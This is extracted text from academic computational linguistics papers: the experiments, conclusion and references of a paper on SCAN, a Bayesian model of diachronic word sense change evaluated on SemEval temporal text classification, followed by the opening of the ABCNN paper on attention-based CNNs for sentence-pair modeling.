power 8 power idea god hand mind body life time object nature 7 power nation world war country time government sir mean lord 6 power time company water force line electric plant day run 5 power government law congress executive president legislative constitution 4 love power life time woman heart god tell little day 3 mind power time life friend woman nature love world reason 2 power people law government mind call king time hand nature 1 power country government nation war increase world political people europe 1700 1720 1740 1760 1780 1800 1820 1840 1860 1880 1900 1920 1940 1960 1980 2000 transport 8 road cost public railway transport rail average service bus time 7 ozone epa example section transport air policy region measure caa 6 time transport land public ship line water vessel london joy 5 air plane ship army day transport land look leave hand 4 time road worker union service public system industry air railway 3 air international worker plane association united union aircraft line president 2 troop ship day land army war send plane supply fleet 1 air joy love heart heaven time company eye hand smile 1700 1720 1740 1760 1780 1800 1820 1840 1860 1880 1900 1920 1940 1960 1980 2000 bank 8 bank tell cashier teller money day ned president house city 7 bank note money deposit credit amount pay species issue bill 6 bank money national note government credit united time currency loan 5 bank dollar money note national president account director company little 4 river day opposite mile bank danube town left country shore 3 bank capital company stock rate national president fund city loan 2 river water stream foot mile tree stand reach little land 1 note bank money time tell leave hard day dollar account Figure 4: Tracking meaning change for the words band, power, transport and bank over 20-year time intervals between 1700 and 2010. Each bar shows the proportion of each sense (color-coded) and is labeled with the start year of the respective time interval. Senses are shown as the 10 most probable words, and particularly representative words are highlighted for illustration. 1700 2010time p (w |s , t ) time line water water company company power power company power power power nuclear line time power force power water company company power company plant nuclear power power water line company time power force force force plant nuclear plant plant water power time power force force water time plant electric electric time utility force force force line water time electric water water time time company company war war company time steam day day plant day force company utility time run day run steam electric line time day time day run run people equal house electric day run steam steam electric electric run utility electric energy carry run steam electric day purchase line steam run water day cost cost electric company day run plant run plant run line people force people run Figure 5: Sense-internal temporal dynamics for the energy sense of the word power (violet/6 in Figure 4). Columns show the ten most highly associated words for each time interval for the period between 1700 and 2010 (ordered by decreasing probability). We highlight how four terms characteristic of the sense develop over time (see {water, steam, plant, nuclear} in the figure). three senses emerge: the institutional power (col- ors gray/1, brown/2, pink/5, orange/7 in the figure), mental power (yellow/3, lightgreen/4, darkgreen/8), and power as supply of energy (violet/6). The latter is an example of a “sense birth” (Mitra et al., 2014): the sense was hardly present before the mid-19th century. This is corroborated by the OED which dates the sense to 1889, whereas the OED contains references to the remaining senses for the whole modeled time period, as predicted by our model. 37 1900-19 1920-39 1900-19 1940-59 1900-19 1960-79 1900-19 1980-99 1900-19 2000-10 1960-79 1980-99 1960-79 2000-10 1980-99 2000-10 0.2 0.4 0.6 pr ec is io n SCAN SCAN-NOT t1 t2 Figure 6: Precision results for the SCAN and SCAN-NOT models on the WordNet-based novel sense detection (Exper- iment 2). Results are shown for a selection of reference times (t1) and focus times (t2). Similar trends of meaning change emerge for transport (Figure 4 bottom left). The bot- tom right plot shows the sense development for the word bank. Although the well-known senses river bank (brown/2, lightgreen/4) and monetary institu- tion (rest) emerge clearly, the overall sense pattern appears comparatively stable across intervals indi- cating that the meaning of the word has not changed much over time. Besides tracking sense prevalence over time, our model can also detect changes within individual senses. Because we are interested in tracking se- mantically stable senses, we fixed the precision pa- rameter κψ to a high value, to discourage too much variance within each sense. Figure 5 illustrates how the energy sense of the word power (violet/6 in Figure 4) has changed over time. Characteristic terms for a given sense are highlighted in bold face. For example, the term “water” is initially prevalent, while the term “steam” rises in prevalence towards the middle of the modeled period, and is superseded by the terms “plant” and “nuclear” towards the end. 6 Experiment 2: Novel Sense Detection In this section and the next we will explicitly eval- uate the temporal representations (i.e., probability distributions) induced by our model, and discuss its performance in the context of previous work. Large-scale evaluation of meaning change is noto- riously difficult, and many evaluations are based on limited hand-annotated goldstandard data sets. Mi- tra et al. (2015), however, bypass this issue by eval- uating the output of their system against WordNet (Fellbaum, 1998). Here, we consider their auto- matic evaluation of sense-births, i.e., the emergence of novel senses. We assume that novel senses are detected at a focus time t2 whilst being compared to a reference time t1. WordNet is used to confirm that the proposed novel sense is indeed distinct from all other induced senses for a given word. Method Mitra et al.’s (2015) evaluation method presupposes a system which is able to detect senses for a set of target words and identify which ones are novel. Our model does not automatically yield nov- elty scores for the induced senses. However, Cook et al. (2014) propose several ways to perform this task post-hoc. We use their relevance score, which is based on the intuition that keywords (or collo- cations) which characterize the difference of a fo- cus corpus from a reference corpus are indicative of word sense novelty. We identify keywords for a focus corpus with re- spect to a reference corpus using Kilgarriff’s (2009) method which is based on smoothed relative fre- quencies.5 The novelty of an induced sense s can be then defined in terms of the aggregate keyword probabilities given that sense (and focus time of in- terest): rel(s) = ∑ w∈W p(w|s,t2). (4) where W is a keyword list and t2 the focus time. Cook et al. (2014) suggest a straightforward extrap- olation from sense novelty to word novelty: rel(c) = max s rel(s), (5) 5We set the smoothing parameter to n = 10, and like Cook et al. (2014) retrieve the top 1000 keywords. 38 t1=1900–1919 t2=1980–1999 union soviet united american union european war civil military people liberty dos system window disk pc operate program run computer de dos entertainment television industry program time business people world president entertainment company station radio station television local program network space tv broadcast air t1=1960–1969 t2=1990–1999 environmental supra note law protection id agency impact policy factor federal users computer window information software system wireless drive web building available virtual reality virtual computer center experience week community separation increase disk hard disk drive program computer file store ram business embolden Table 2: Example target terms (left) with novel senses (right) as identified by SCAN in focus corpus t2 (when compared against reference corpus t1). Top: terms used in novel sense detection study (Experiment 2). Bottom: terms from the Gulordava and Baroni (2011) gold standard (Experiment 3). where rel(c) is the highest novelty score assigned to any of the target word’s senses. A high rel(c) score suggests that a word has undergone meaning change. We obtained candidate terms and their associ- ated novel senses from the DATE corpus, using the relevance metric described above. The novel senses from the focus period and all senses induced for the reference period, except for the one corre- sponding to the novel sense, were passed on to Mitra et al.’s (2015) WordNet-based evaluator which pro- ceeds as follows. Firstly, each induced sense s is mapped to the WordNet synset u with the maximum overlap: synset(s) = arg max u overlap(s,u). (6) Next, a predicted novel sense n is deemed truly novel if its mapped synset is distinct from any synset mapped to a different induced sense: ∀s′synset(s′) 6= synset(n). (7) Finally, overall precision is calculated as the frac- tion of sense-births confirmed by WordNet over all birth-candidates proposed by the model. Like Mitra et al. (2015) we only report results on target words for which all induced senses could be successfully mapped to a synset. Models and Parameters We obtained the broad set of target words used for the task-based evalua- tion (in Section 8) and trained models on the DATE corpus. We set the number of senses K = 4 fol- lowing Mitra et al. (2015) who note that the Word- Net mapper works best for words with a small num- ber of senses, and the time intervals to ∆T = 20 as in Experiment 1. We identified 200 words6 with highest novelty score (Equation (5)) as sense birth candidates. We compared the performance of the full SCAN model against SCAN-NOT which learns senses independently for time intervals. We trained both models on the same data with identical pa- rameters. For SCAN-NOT, we must post-hoc iden- tify corresponding senses across time intervals. We used the Jensen-Shannon divergence between the reference- and focus-time specific word distribu- tions JS(p(w|s,t1)||p(w|s,t2)) and assigned each focus-time sense to the sense with smallest diver- gence at reference time. Results Figure 6 shows the performance of our models on the task of sense birth detection. SCAN performs better than SCAN-NOT, underscoring the importance of joint modeling of senses across time slices and incorporation of temporal dynamics. Our accuracy scores are in the same ballpark as Mitra et al. (2014, 2015). Note, however that the scores are not directly comparable due to differences in train- ing corpora, focus and reference times, and candi- date words. Mitra et al. (2015) use the larger Google syntactic n-gram corpus, as well as richer linguis- tic information in terms of syntactic dependencies. We show that our model which does not rely on syntactic annotations performs competitively even when trained on smaller data. Table 2 (top) displays examples of words assigned highest novelty scores for the reference period 1900–1919 and focus pe- riod 1980–1999. 6This threshold was tuned on one reference-focus time pair. 39 7 Experiment 3: Word Meaning Change In this experiment we evaluate whether model in- duced temporal word representations capture per- ceived word novelty. Specifically, we adopt the eval- uation framework (and dataset) introduced in Gulor- dava and Baroni (2011)7 and discussed below. Method Gulordava and Baroni (2011) do not model word senses directly; instead they obtain dis- tributional representations of words from the Google Books (bigram) data for two time slices, namely the 1960s (reference corpus) and 1990s (focus cor- pus). To detect change in meaning, they measure cosine similarity between the vector representations of a target word in the reference and focus corpus. It is assumed that low similarity indicates signifi- cant meaning change. To evaluate the output of their system, they created a test set of 100 target words (nouns, verbs, and adjectives), and asked five anno- tators to rate each word with respect to its degree of meaning change between the 1960s and the 1990s. The annotators used a 4-point ordinal scale (0: no change, 1: almost no change, 2: somewhat change, 3: changed significantly). Words were subsequently ranked according to the mean rating given by the annotators. Inter-annotator agreement on the novel sense detection task was 0.51 (pairwise Pearson cor- relation) and can be regarded as an upper bound on model performance. Models and Parameters We trained models for all words in Gulordava and Baroni’s (2011) gold- standard. We used the DATE subcorpus cover- ing years 1960 through 1999 partitioned by decade (∆T = 10). The first and last time interval were defined as reference and focus time, respec- tively (t1=1960–1969, t2=1990–1999). As in Ex- periment 2, a novelty score was assigned to each target word (using Equation (5)). We computed Spearman’s ρ rank correlations between gold stan- dard and model rankings (Gulordava and Baroni, 2011). We trained SCAN models setting the num- ber of senses to K = 8. We also trained SCAN-NOT models with identical parameters. We report results averaged over five independent parameter estimates. Finally, as in Gulordava and Baroni (2011) we com- pare against a frequency baseline which ranks words 7We thank Kristina Gulordava for sharing their evaluation data set of target words and human judgments. system corpus Spearman’s ρ Gulordava (2011) Google 0.386 SCAN DATE 0.377 SCAN-NOT DATE 0.255 frequency baseline DATE 0.325 Table 3: Spearman’s ρ rank correlations between system novelty rankings and the human-produced ratings. All correlations are statistically significant (p < 0.02). Re- sults for SCAN and SCAN-NOT are averages over five trained models. by their log relative frequency in the reference and focus corpus. Results The results of this evaluation are shown in Table 3. As can be seen, SCAN outperforms SCAN-NOT and the frequency baseline. For refer- ence, we also report the correlation coefficient ob- tained in Gulordava and Baroni (2011) but empha- size that the scores are not directly comparable due to differences in training data: Gulordava and Ba- roni (2011) use the Google bigrams corpus (which is much larger compared to DATE). Table 2 (bottom) displays examples of words which achieved highest novelty scores in this evaluation, and their associated novel senses. 8 Experiment 4: Task-based Evaluation In the previous sections we demonstrated how SCAN captures meaning change between two periods. In this section, we assess our model on an extrinsic task which relies on meaning representations span- ning several time slices. We quantitatively evaluate our model on the SemEval-2015 benchmark datasets released as part of the Diachronic Text Evaluation exercise (Popescu and Strapparava 2015; DTE). In the following we first present the DTE subtasks, and then move on to describe our training data, parame- ter settings, and systems used for comparison to our model. SemEval DTE Tasks Diachronic text evaluation is an umbrella term used by the SemEval-2015 or- ganizers to represent three subtasks aiming to assess the performance of computational methods used to identify when a piece of text was written. A simi- lar problem is tackled in Chambers (2012) who la- bel documents with time stamps whilst focusing on 40 explicit time expressions and their discriminatory power. The SemEval data consists of news snip- pets, which range between a few words and mul- tiple sentences. A set of training snippets, as well as gold-annotated development and test datasets are provided. DTE subtasks 1 and 2 involve tempo- ral classification: given a news snippet and a set of non-overlapping time intervals covering the pe- riod 1700 through 2010, the system’s task is to se- lect the interval corresponding to the snippet’s year of origin. Temporal intervals are consecutive and constructed such that the correct interval is centered around the actual year of origin. For both tasks tem- poral intervals are created at three levels of granular- ity (fine, medium, and coarse). Subtask 1 involves snippets which contain an ex- plicit cue for time of origin. The presence of a temporal cue was determined by the organizers by checking the entities’ informativeness in external re- sources. Consider the example below: (8) President de Gaulle favors an independent European nuclear striking force [...] The mentions of French president de Gaulle and nu- clear warfare suggest that the snippet was written after the mid-1950s and indeed it was published in 1962. A hypothetical system would then have to de- cide amongst the following classes: {1700–1702, 1703–1705, ..., 1961–1963, ..., 2012–2014} {1699–1706, 1707–1713, ..., 1959–1965, ..., 2008–2014} {1696–1708, 1709–1721, ..., 1956–1968, ..., 2008–2020} The first set of classes correspond to fine-grained in- tervals of 2-years, the second set to medium-grained intervals of 6-years and the third set to coarse- grained intervals of 12-years. For the snippet in example (8) classes 1961–1963, 1959–1965, and 1956–1968 are the correct ones. Subtask 2 involves temporal classification of snip- pets which lack explicit temporal cues, but contain implicit ones, e.g., as indicated by lexical choice or spelling. The snippet in example (9) was published in 1891 and the spelling of to-day, which was com- mon up to the early 20th century, is an implicit cue: (9) The local wheat market was not quite so strong to-day as yesterday. Analogously to subtask 1, systems must select the right temporal interval from a set of contiguous time intervals of differing granularity. For this task, which is admittedly harder, levels of temporal gran- ularity are coarser corresponding to 6-year, 12-year and 20-year intervals. Participating SemEval Systems We compared our model against three other systems which par- ticipated in the SemEval task.8 AMBRA (Zampieri et al., 2015) adopts a learning-to-rank modeling ap- proach and uses several stylistic, grammatical, and lexical features. IXA (Salaberri et al., 2015) uses a combination of approaches to determine the pe- riod of time in which a piece of news was writ- ten. This involves searching for specific mentions of time within the text, searching for named enti- ties present in the text and then establishing their reference time by linking these to Wikipedia, using Google n-grams, and linguistic features indicative of language change. Finally, UCD (Szymanski and Lynch, 2015) employs SVMs for classification us- ing a variety of informative features (e.g., POS-tag n-grams, syntactic phrases), which were optimized for the task through automatic feature selection. Models and Parameters We trained our model for individual words and obtained representations of their meaning for different points in time. Our set of target words consisted of all nouns which oc- curred in the development datasets for DTE sub- tasks 1 and 2 as well as all verbs which occurred at least twice in this dataset. After removing in- frequent words we were left with 883 words (out of 1,116) which we used in this evaluation. Target words were not optimized with respect to the test data in any way; it is thus reasonable to expect bet- ter performance with an adjusted set of words. We set the model time interval to ∆T = 5 years and the number of senses per word to K = 8. We also evaluated SCAN-NOT, the stripped-down version of SCAN, with identical parameters. Both SCAN and SCAN-NOT predict the time of origin for a test snippet as follows. We first detect mentions of target words in the snippet. Then, for each men- tion c we construct a document, akin to the training documents, consisting of c and its context w, the ±5 words surrounding c. Given {c,w}, we approximate 8We do not report results for the system USAAR which achieved close to 100% accuracy by searching for the test snip- pets on the web, without performing any temporal inference. 41 Task 1 Task 2 2 yr 6 yr 12 yr 6 yr 12 yr 20 yr acc p acc p acc p acc p acc p acc p Baseline .097 .010 .214 .017 .383 .046 .199 .025 .343 .047 .499 .057 SCAN-NOT .265 .086 .435 .139 .609 .169 .259 .041 .403 .056 .567 .098 SCAN .353 .049 .569 .112 .748 .206 .376 .053 .572 .091 .719 .135 IXA .187 .020 .375 .041 .557 .090 .261 .037 .428 .067 .622 .098 AMBRA .167 .037 .367 .071 .554 .074 .605 .143 .767 .143 .868 .292 UCD – – – – – – .759 .463 .846 .472 .910 .542 SVM SCAN .192 .034 .417 .097 .545 .127 .573 .331 .667 .368 .790 .428 SVM SCAN+ngram .222 .030 .467 .079 .627 .142 .747 .481 .821 .500 .897 .569 Table 4: Results on Diachronic Text Evaluation Tasks 1 and 2 for a random baseline, our SCAN model, its stripped- down version without iGMRFs (SCAN-NOT), the SemEval submissions (IXA, AMBRA and UCD), and SVMs trained with SCAN features (SVM SCAN), and with additional character n-gram features (SVM SCAN+ngram). Results are shown for three levels of granularity, a strict precision measure p, and a distance-discounting measure acc. a distribution over time intervals as: p(c)(t|w) ∝ p(c)(w|t) ×p(c)(t) (10) where the superscript (c) indicates parameters from the word-specific model, we marginalize over senses and assume a uniform distribution over time slices p(c)(t). Finally, we combine the word-wise predic- tions into a final distribution p(t) = ∏ c p (c)(t|,w), and predict the time t with highest probability. Supervised Classification We also apply our model in a supervised setting, i.e., by extracting features for classifier prediction. Specifically, we trained a multiclass SVM (Chang and Lin, 2011) on the training data provided by the SemEval organiz- ers (for DTE tasks 1 and 2). For each observed word within each snippet, we added as feature its most likely sense k given t, the true time of origin: arg max k p(c)(k|t). (11) We also trained a multiclass SVM which uses char- acter n-gram (n ∈ {1, 2, 3}) features in addition to the model features. Szymanski and Lynch (2015) identified character n-grams as the most predictive feature for temporal text classification using SVMs. Their system (UCD) achieved the best published scores in DTE subtask 2. Following their approach, we included all n-grams that were observed more than 20 times in the DTE training data. Results We employed two evaluation measures proposed by the DTE organizers. These are pre- cision p, i.e., the percentage of times a system has predicted the correct time period. And accuracy acc which is more lenient, and penalizes system predic- tions proportional to their distance from the true in- terval. We compute the p and acc scores for our models using the evaluation script provided by the SemEval organizers. Table 4 summarizes our re- sults for DTE subtasks 1 and 2. We compare SCAN against a baseline which selects a time interval at random9 averaged over five runs. We also show re- sults for a stripped-down version of our model with- out the iGMRFs (SCAN-NOT) and for the systems which participated in SemEval. For subtask 1, the two versions of SCAN out- perform all SemEval systems across the board. SCAN-NOT occasionally outperforms SCAN in the strict precision metric, however, the full SCAN model consistently achieves better accuracy scores which are more representative since they factor in the proximity of the prediction to the true value. In subtask 2, the UCD and SVM SCAN+ngram systems perform comparably. They both use SVMs for the classification task, however our own model employs a less expressive feature set based on SCAN and character n-grams, and does not take advantage of feature selection which would presumably enhance performance. With the exception of AMBRA, all other participating systems used external resources (such as Wikipedia and Google n-grams); it is thus fair to assume they had access to at least as much training data as our SCAN model. Consequently, the 9We recomputed the baseline scores for subtasks 1 and 2 due to inconsistencies in the results provided by the DTE organizers. 42 gap in performance can not solely be attributed to a difference in the size of the training data. We also observe that IXA and SCAN, given iden- tical granularity, perform better on subtask 1, while AMBRA and our own SVM-based systems exhibit the opposite trend. The IXA system uses a combi- nation of knowledge sources in order to determine when a piece of news was written, including ex- plicit mentions of temporal expressions within the text, named entities, and linked information to those named entities from Wikipedia. AMBRA on the other hand exploits more shallow stylistic, grammat- ical and lexical features within the learning-to-rank paradigm. An interesting direction for future work would be to investigate which features are most ap- propriate for different DTE tasks. Overall, it is en- couraging to see that the generic temporal word rep- resentations inferred by SCAN lead to competitively performing models on both temporal classification tasks without any explicit tuning. 9 Conclusion In this paper we introduced SCAN, a dynamic Bayesian model of diachronic meaning change. Our model learns a coherent set of co-dependent time-specific senses for individual words and their prevalence. Evaluation of the model’s output showed that the learnt representations reflect (a) dif- ferent senses of ambiguous words (b) different kinds of meaning change (such as new senses being estab- lished), and (c) connotational changes within senses. SCAN departs from previous work in that it models temporal dynamics explicitly. We demonstrated that this feature yields more general semantic represen- tations as indicated by predictive loglikelihood and a variety of extrinsic evaluations. We also experi- mentally evaluated SCAN on novel sense detection and the SemEval DTE task, where it performed on par with the best published results, without any ex- tensive feature engineering or task specific tuning. We conclude by discussing limitations of our model and directions for future work. In our exper- iments we fix the number of senses K for all words across all time periods. Although this approach did not harm performance (even in case of SemEval where we handled more than 800 target concepts), it is at odds with the fact that words vary in their degree of ambiguity, and that word senses continu- ously appear and disappear. A non-parametric ver- sion of our model would infer an appropriate number of senses from the data, individually for each time period. Also note that in our experiments we used context as a bag of words. It would be interesting to explore more systematically how different kinds of contexts (e.g., named entities, multiword expres- sions, verbs vs. nouns) influence the representations the model learns. Furthermore, while SCAN cap- tures the temporal dynamics of word senses, it can- not do so for words themselves. Put differently, the model cannot identify whether a new word is used which did not exist before, or that a word ceased to exist after a specific point in time. A model internal way of detecting word (dis)appearance would be de- sirable, especially since new terms are continuously being introduced thanks to popular culture and vari- ous new media sources. In the future, we would like to apply our model to different text genres and levels of temporal granular- ity. For example, we could work with Twitter data, an increasingly popular source for opinion tracking, and use our model to identify short-term changes in word meanings or connotations. Acknowledgments We are grateful to the anonymous reviewers whose feedback helped to substantially improve the present paper. We thank Charles Sutton and Iain Murray for helpful discussions, and acknowledge the support of EPSRC through project grant EP/I037415/1. References Aitchison, Jean. 2001. Language Change: Progress Or Decay?. Cambridge Approaches to Linguis- tics. Cambridge University Press. Biemann, Chris. 2006. Chinese Whispers - an Effi- cient Graph Clustering Algorithm and its Appli- cation to Natural Language Processing Problems. In Proceedings of TextGraphs: the 1st Workshop on Graph Based Methods for Natural Language Processing. New York City, NY, USA, pages 73– 80. Bird, Steven, Ewan Klein, and Edward Loper. 2009. Natural Language Processing with Python. O’Reilly Media, Inc., 1st edition. Blei, David M. and John D. Lafferty. 2006a. Cor- 43 related Topic Models. In Advances in Neural In- formation Processing Systems 18, Vancouver, BC, Canada, pages 147–154. Blei, David M. and John D. Lafferty. 2006b. Dy- namic Topic Models. In Proceedings of the 23rd International Conference on Machine Learning. Pittsburgh, PA, USA, pages 113–120. Brody, Samuel and Mirella Lapata. 2009. Bayesian Word Sense Induction. In Proceedings of the 12th Conference of the European Chapter of the ACL. Athens, Greece, pages 103–111. Chambers, Nathanael. 2012. Labeling Documents with Timestamps: Learning from their Time Ex- pressions. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics. Jeju Island, Korea, pages 98–106. Chang, Chih-Chung and Chih-Jen Lin. 2011. LIBSVM: A library for support vector ma- chines. ACM Transactions on Intelligent Sys- tems and Technology 2:27:1–27:27. Software available at http://www.csie.ntu.edu. tw/˜cjlin/libsvm. Chen, Jianfei, Jun Zhu, Zi Wang, Xun Zheng, and Bo Zhang. 2013. Scalable Inference for Logistic- Normal Topic Models. In Advances in Neural In- formation Processing Systems, Lake Tahoe, NV, USA, pages 2445–2453. Cook, Paul, Jey Han Lau, Diana McCarthy, and Timothy Baldwin. 2014. Novel Word-sense Iden- tification. In Proceedings of the 25th Interna- tional Conference on Computational Linguistics: Technical Papers. Dublin, Ireland, pages 1624– 1635. Cook, Paul and Suzanne Stevenson. 2010. Automat- ically Identifying Changes in the Semantic Orien- tation of Words. In Proceedings of the Seventh International Conference on Language Resources and Evaluation. Valletta, Malta, pages 28–34. Davies, Mark. 2010. The Corpus of Historical American English: 400 million words, 1810- 2009. Available online at http://corpus. byu.edu/coha/. Diller, Hans-Jürgen, Hendrik de Smet, and Jukka Tyrkkö. 2011. A European database of descriptors of english electronic texts. The European English messenger 19(2):29–35. Fellbaum, Christiane. 1998. WordNet: An Electronic Lexical Database. Bradford Books. Groenewald, Pieter C. N. and Lucky Mokgatlhe. 2005. Bayesian Computation for Logistic Regres- sion. Computational Statistics & Data Analysis 48(4):857–868. Gulordava, Kristina and Marco Baroni. 2011. A Dis- tributional Similarity Approach to the Detection of Semantic Change in the Google Books Ngram Corpus. In Proceedings of the Workshop on GEo- metrical Models of Natural Language Semantics. Edinburgh, Scotland, pages 67–71. Kilgarriff, Adam. 2009. Simple maths for keywords. In Proceedings of the Corpus Linguistics Confer- ence. Kim, Yoon, Yi-I Chiu, Kentaro Hanaki, Darshan Hegde, and Slav Petrov. 2014. Temporal Anal- ysis of Language through Neural Language Mod- els. In Proceedings of the ACL 2014 Workshop on Language Technologies and Computational So- cial Science. Baltimore, MD, USA, pages 61–65. Kulkarni, Vivek, Rami Al-Rfou, Bryan Perozzi, and Steven Skiena. 2015. Statistically Significant De- tection of Linguistic Change. In Proceedings of the 24th International Conference on World Wide Web. Geneva, Switzerland, pages 625–635. Lau, Han Jey, Paul Cook, Diana McCarthy, Span- dana Gella, and Timothy Baldwin. 2014. Learn- ing Word Sense Distributions, Detecting Unat- tested Senses and Identifying Novel Senses us- ing Topic Models. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics. Baltimore, MD, USA, pages 259–270. Lau, Jey Han, Paul Cook, Diana McCarthy, David Newman, and Timothy Baldwin. 2012. Word Sense Induction for Novel Sense Detection. In Proceedings of the 13th Conference of the Eu- ropean Chapter of the Association for Computa- tional Linguistics. Avignon, France, pages 591– 601. McMahon, April M.S. 1994. Understanding Lan- guage Change. Cambridge University Press. Mihalcea, Rada and Vivi Nastase. 2012. Word Epoch Disambiguation: Finding How Words Change over Time. In Proceedings of the 50th 44 http://www.csie.ntu.edu.tw/~cjlin/libsvm http://www.csie.ntu.edu.tw/~cjlin/libsvm http://corpus.byu.edu/coha/ http://corpus.byu.edu/coha/ Annual Meeting of the Association for Computa- tional Linguistics. Jeju Island, Korea, pages 259– 263. Mimno, David, Hanna Wallach, and Andrew Mc- Callum. 2008. Gibbs Sampling for Logistic Nor- mal Topic Models with Graph-Based Priors. In NIPS Workshop on Analyzing Graphs. Vancouver, Canada. Mitra, Sunny, Ritwik Mitra, Suman Kalyan Maity, Martin Riedl, Chris Biemann, Pawan Goyal, and Animesh Mukherjee. 2015. An automatic ap- proach to identify word sense changes in text me- dia across timescales. Natural Language Engi- neering 21:773–798. Mitra, Sunny, Ritwik Mitra, Martin Riedl, Chris Biemann, Animesh Mukherjee, and Pawan Goyal. 2014. That’s sick dude!: Automatic identification of word sense change across different timescales. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics. Balti- more, MD, USA, pages 1020–1029. Ó Séaghdha, Diarmuid. 2010. Latent Variable Mod- els of Selectional Preference. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics. Uppsala, Sweden, pages 435–444. Popescu, Octavian and Carlo Strapparava. 2013. Be- hind the Times: Detecting Epoch Changes using Large Corpora. In Proceedings of the Sixth Inter- national Joint Conference on Natural Language Processing. Nagoya, Japan, pages 347–355. Popescu, Octavian and Carlo Strapparava. 2015. Se- mEval 2015, Task 7: Diachronic Text Evaluation. In Proceedings of the 9th International Workshop on Semantic Evaluation (SemEval 2015). Denver, CO, USA, pages 869–877. Ritter, Alan, Mausam, and Oren Etzioni. 2010. A Latent Dirichlet Allocation Method for Selec- tional Preferences. In Proceedings of the 48th Annual Meeting of the Association for Computa- tional Linguistics. Uppsala, Sweden, pages 424– 434. Rue, Håvard and Leonhard Held. 2005. Gaussian Markov Random Fields: Theory and Applica- tions. Chapman & Hall/CRC Monographs on Statistics & Applied Probability. CRC Press. Sagi, Eyal, Stefan Kaufmann, and Brady Clark. 2009. Semantic Density Analysis: Comparing Word Meaning across Time and Phonetic Space. In Proceedings of the Workshop on Geometrical Models of Natural Language Semantics. Athens, Greece, pages 104–111. Salaberri, Haritz, Iker Salaberri, Olatz Arregi, and Beñat Zapirain. 2015. IXAGroupEHUDiac: A Multiple Approach System towards the Di- achronic Evaluation of Texts. In Proceedings of the 9th International Workshop on Semantic Eval- uation (SemEval 2015). Denver, CO, USA, pages 840–845. Stevenson, Angus, editor. 2010. The Oxford English Dictionary. Oxford University Press, third edi- tion. Szymanski, Terrence and Gerard Lynch. 2015. UCD: Diachronic Text Classification with Char- acter, Word, and Syntactic N-grams. In Pro- ceedings of the 9th International Workshop on Se- mantic Evaluation (SemEval 2015). Denver, CO, USA, pages 879–883. Tahmasebi, Nina, Thomas Risse, and Stefan Di- etze. 2011. Towards automatic language evolu- tion tracking, A study on word sense tracking. In Proceedings of the Joint Workshop on Knowl- edge Evolution and Ontology Dynamics (EvoDyn 2011). Bonn, Germany. Wijaya, Derry Tanti and Reyyan Yeniterzi. 2011. Understanding Semantic Change of Words over Centuries. In Proceedings of the 2011 Inter- national Workshop on DETecting and Exploiting Cultural diversiTy on the Social Web. Glasgow, Scotland, UK, pages 35–40. Zampieri, Marcos, Alina Maria Ciobanu, Vlad Nic- ulae, and Liviu P. Dinu. 2015. AMBRA: A Rank- ing Approach to Temporal Text Classification. In Proceedings of the 9th International Workshop on Semantic Evaluation (SemEval 2015). Denver, CO, USA, pages 851–855. 45 46 work_ea2y7a4x6zabxp5sgs3jl5skuy ---- ABCNN: Attention-Based Convolutional Neural Network for Modeling Sentence Pairs Wenpeng Yin, Hinrich Schütze Center for Information and Language Processing LMU Munich, Germany wenpeng@cis.lmu.de Bing Xiang, Bowen Zhou IBM Watson Yorktown Heights, NY, USA bingxia,zhou@us.ibm.com Abstract How to model a pair of sentences is a critical issue in many NLP tasks such as answer selec- tion (AS), paraphrase identification (PI) and textual entailment (TE). Most prior work (i) deals with one individual task by fine-tuning a specific system; (ii) models each sentence’s representation separately, rarely considering the impact of the other sentence; or (iii) re- lies fully on manually designed, task-specific linguistic features. This work presents a gen- eral Attention Based Convolutional Neural Network (ABCNN) for modeling a pair of sentences. We make three contributions. (i) The ABCNN can be applied to a wide va- riety of tasks that require modeling of sen- tence pairs. (ii) We propose three attention schemes that integrate mutual influence be- tween sentences into CNNs; thus, the rep- resentation of each sentence takes into con- sideration its counterpart. These interdepen- dent sentence pair representations are more powerful than isolated sentence representa- tions. (iii) ABCNNs achieve state-of-the-art performance on AS, PI and TE tasks. We release code at: https://github.com/ yinwenpeng/Answer_Selection. 1 Introduction How to model a pair of sentences is a critical is- sue in many NLP tasks such as answer selection (AS) (Yu et al., 2014; Feng et al., 2015), paraphrase identification (PI) (Madnani et al., 2012; Yin and Schütze, 2015a), textual entailment (TE) (Marelli et al., 2014a; Bowman et al., 2015a) etc. A S s0 how much did Waterboy gross? s+1 the movie earned $161.5 million s−1 this was Jerry Reed’s final film appearance P I s0 she struck a deal with RH to pen a book today s+1 she signed a contract with RH to write a book s−1 she denied today that she struck a deal with RH T E s0 an ice skating rink placed outdoors is full of people s+1 a lot of people are in an ice skating park s−1 an ice skating rink placed indoors is full of people Figure 1: Positive (<s0, s + 1 >) and negative (<s0, s − 1 >) examples for AS, PI and TE tasks. RH = Random House Most prior work derives each sentence’s represen- tation separately, rarely considering the impact of the other sentence. This neglects the mutual influ- ence of the two sentences in the context of the task. It also contradicts what humans do when comparing two sentences. We usually focus on key parts of one sentence by extracting parts from the other sentence that are related by identity, synonymy, antonymy and other relations. Thus, human beings model the two sentences together, using the content of one sen- tence to guide the representation of the other. Figure 1 demonstrates that each sentence of a pair partially determines which parts of the other sen- tence we must focus on. For AS, correctly answer- ing s0 requires attention on “gross”: s + 1 contains a corresponding unit (“earned”) while s−1 does not. For PI, focus should be removed from “today” to correctly recognize < s0, s + 1 > as paraphrases and < s0, s − 1 > as non-paraphrases. For TE, we need to focus on “full of people” (to recognize TE for <s0, s + 1 >) and on “outdoors” / “indoors” (to recog- nize non-TE for < s0, s − 1 >). These examples show the need for an architecture that computes different representations of si for different s1−i (i ∈{0, 1}). https://github.com/yinwenpeng/Answer_Selection https://github.com/yinwenpeng/Answer_Selection Convolutional Neural Networks (CNNs) (LeCun et al., 1998) are widely used to model sentences (Kalchbrenner et al., 2014; Kim, 2014) and sen- tence pairs (Socher et al., 2011; Yin and Schütze, 2015a), especially in classification tasks. CNNs are supposed to be good at extracting robust and abstract features of input. This work presents the ABCNN, an attention-based convolutional neural network, that has a powerful mechanism for mod- eling a sentence pair by taking into account the interdependence between the two sentences. The ABCNN is a general architecture that can handle a wide variety of sentence pair modeling tasks. Some prior work proposes simple mechanisms that can be interpreted as controlling varying atten- tion; e.g., Yih et al. (2013) employ word alignment to match related parts of the two sentences. In con- trast, our attention scheme based on CNNs models relatedness between two parts fully automatically. Moreover, attention at multiple levels of granularity, not only at word level, is achieved as we stack mul- tiple convolution layers that increase abstraction. Prior work 